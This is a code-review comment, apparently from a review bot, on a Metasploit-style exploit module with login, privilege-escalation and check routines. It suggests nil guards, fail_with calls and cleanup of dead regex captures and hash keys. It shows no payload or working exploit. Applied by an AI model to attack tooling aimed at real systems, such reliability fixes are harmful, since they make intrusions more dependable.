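Review bot: The responses from `send_request_cgi` are still dereferenced before any nil check on the new side — `res.code` in `check`, `res_auth.headers['Server']` in `exploit` (read before the `if res_auth && ...` guard), and `matchdata[0]` after both `.match` calls — so a dropped connection or an unexpected page raises NoMethodError instead of failing cleanly. Guard them with `return Exploit::CheckCode::Unknown unless res`, `fail_with(Failure::Unreachable, 'Login request failed') unless res_auth` and `fail_with(Failure::UnexpectedReply, 'Could not extract id') unless matchdata`, and turn the `print_error('File not found')` branch into a `fail_with` as well, since the module currently proceeds to run the monitor regardless. The `cookie = Regexp.last_match(1)` assignments in both login blocks are always nil because `/login=true/` has no capture group, and `cookie` is never read, so they should be dropped rather than mechanically converted from `$1`. The duplicated `'newuser'` key in the privilege-escalation `vars_post` hash means only `'1'` is sent and the `'on'` entry is dead; `'Privileged' => 'True'` should be the boolean `true`, and the empty `'References'` entries should be removed or filled in before merge.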